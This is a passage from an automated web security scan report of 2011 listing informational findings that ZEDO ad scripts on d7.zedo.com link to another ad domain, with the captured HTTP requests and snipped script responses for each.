http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg=&z=2816412382 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342314330&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=116
Expires: Tue, 06 Sep 2011 15:53:52 GMT
Date: Tue, 06 Sep 2011 15:51:56 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;

...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=31433009=_4e66419c,2816412382,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=31433009/optn=64?trg="></iframe>
...[SNIP]...

19.40. http://d7.zedo.com/jsc/d3/fl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=&z=0224774881

The response contains the following link to another domain:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=&z=0224774881 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=502
Expires: Tue, 06 Sep 2011 15:24:18 GMT
Date: Tue, 06 Sep 2011 15:15:56 GMT
Content-Length: 1867
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;

...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg="></iframe>
...[SNIP]...

19.41. http://d7.zedo.com/jsc/d3/fl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=&z=7061078845

The response contains the following link to another domain:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg=&z=7061078845 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340464698&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=109
Expires: Tue, 06 Sep 2011 15:22:56 GMT
Date: Tue, 06 Sep 2011 15:21:07 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;

...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=70609416=_4e663a63,7061078845,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=70609416/optn=64?trg="></iframe>
...[SNIP]...

19.42. http://d7.zedo.com/jsc/d3/fl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=&z=1475285476

The response contains the following link to another domain:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg=&z=1475285476 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342624689&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=775
Expires: Tue, 06 Sep 2011 16:10:03 GMT
Date: Tue, 06 Sep 2011 15:57:08 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;

...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=92276994=_4e6642d3,1475285476,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=92276994/optn=64?trg="></iframe>
...[SNIP]...

19.43. http://d7.zedo.com/jsc/d3/fl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=&z=8430606850

The response contains the following link to another domain:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg=&z=8430606850 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341080962&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=394
Expires: Tue, 06 Sep 2011 15:37:57 GMT
Date: Tue, 06 Sep 2011 15:31:23 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;

...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=80753902=_4e663ccb,8430606850,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=80753902/optn=64?trg="></iframe>
...[SNIP]...

19.44. http://d7.zedo.com/jsc/d3/fl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/jsc/d3/fl.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=&z=8134664386

The response contains the following link to another domain:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=

Request

GET /jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg=&z=8134664386 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341389329&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1bc1632-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=139
Expires: Tue, 06 Sep 2011 15:38:50 GMT
Date: Tue, 06 Sep 2011 15:36:31 GMT
Content-Length: 1869
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;

...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

document.write('<iframe scrolling="no" height="250" frameborder="0" width="300" style="overflow: hidden; width: 300px; height: 250px; padding: 0px; margin: 0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" src="http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=10667129=_4e663dff,8134664386,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=10667129/optn=64?trg="></iframe>
...[SNIP]...

19.45. http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/lar/v11-001/d7/jsc/flr.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/lar/v11-001/d7/jsc/flr.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=&z=0224774881

The response contains the following link to another domain:

http://serve.directdigitalllc.com/serve.php?bid=26&t202id=35073&click=http://yads.zedo.com/ads2/c%3Fa=906408%3Bn=1197%3Bx=2304%3Bc=1197000038,1197000038%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1087333%3Bh%3D840708%3Bk=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=

Request

GET /lar/v11-001/d7/jsc/flr.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=7863048=_4e66392c,0224774881,768033^1017217^1184^0,1_/xsxdata=$XSXDATA/bnum=7863048/optn=64?trg=&z=0224774881 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "1ea7ed1-4fbc-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=420
Date: Tue, 06 Sep 2011 15:15:56 GMT
Content-Length: 1867
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=2;var zzPat='';

var zzhasAd;

...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

